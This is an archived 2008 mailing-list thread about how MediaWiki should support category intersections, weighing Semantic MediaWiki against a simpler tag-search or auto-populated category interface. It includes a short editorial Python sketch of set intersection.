On Wed, 23 Apr 2008 18:01:54 +0200, Gerard Meijssen wrote:

> Hi,
> It would be cool if there were more clarity about this. Semantic MediaWiki
> has been around for a long time. All the major criticisms of the past have
> been dealt with. It cannot be said that the code is unknown or unknowable.
> It has only one new command, it performs much better compared to last year,
> it is being localised at Betawiki. I was told that even Wikia supports it on
> request for its wikis...
>
> Being able to break the SMW code into parts is indicative of code that is
> built in a modular way. SMW would make a bigger difference in my mind than
> the introduction of catalogs. It would be a massive boost to our aim to make
> information available to the world.
>
> Truly, if Semantic MediaWiki is not to be considered, at least be clear why.
> The alternative is unpleasant speculations and technical solutions that are
> considered not necessarily the best.
>
> Thanks,
> GerardM
>
> On Wed, Apr 23, 2008 at 5:29 PM, Steve Sanbeg <ssanbeg [at] ask> wrote:
>
>> On Tue, 22 Apr 2008 20:01:43 +0200, Roan Kattouw wrote:
>>
>> > Steve Sanbeg wrote:
>> >>
>> >> So maybe it would make sense to develop an extension that would use the
>> >> category ID with an SMW like front end, using code broken off from both
>> >> extensions?
>> > Wouldn't it be better just to improve SMW's category handling?
>> >
>> > Roan Kattouw (Catrope)
>>
>> That should be the end result. But it seems it's been decided that
>> SMW is too monolithic, and Markus has already offered to split parts into
>> smaller extensions, so this seems like the logical place to start.
>>
>> -Steve





dgerard at gmail

Apr 24, 2008, 2:57 PM

Post #50 of 59 (944 views)
Permalink
Re: So... status of category intersections? [In reply to]

2008/4/24 Steve Sanbeg <ssanbeg [at] ask>:

> It seems that what's mostly needed now is a front end for category
> intersection. The one new function you talk about, and its associated
> special pages, are the only implementation of that that I'm aware of.


Um, yes. What do we want as an interface?

1. A search interface: "Enter tags:"

2. For [[Category:Left-handed living Jewish American lesbian poets of
Martian citizenship]] to automatically populate from the intersection
of tags "Left-handed people", "Living people", "Jewish people",
"American people", "Lesbians", "Poets" and "Martian citizens".

The second is harder but lets us preserve the querulously tiny
subcategories for backward compatibility. OTOH, luring people prone to
idiot wiki flamewars into an idiot wiki flamewar keeps them too busy
to mess up anything important. So let's not regard 2. as being a
blocker in any way whatsoever.
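
[Editor's sketch] Whichever interface wins, both options reduce to the same operation: intersecting the page sets of several tags. A minimal Python model follows, assuming a hypothetical in-memory index that maps each tag to the set of page titles carrying it. The function name intersect_categories and any sample data fed to it are made up for illustration; nothing here reflects how core or Lucene actually stores categories.

```python
def intersect_categories(index, categories):
    # Return the sorted titles of pages that carry every requested tag.
    # index: dict mapping tag name -> set of page titles (hypothetical layout).
    if not categories:
        return []
    # Start from the smallest set so the working set shrinks as fast as possible.
    page_sets = sorted((index.get(c, set()) for c in categories), key=len)
    result = set(page_sets[0])
    for pages in page_sets[1:]:
        result &= pages
        if not result:
            break  # nothing can match any more
    return sorted(result)
```

Option 1 would call this with whatever the user types into the search box; option 2 would call it with a fixed tag list attached to the combined category page.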


- d.

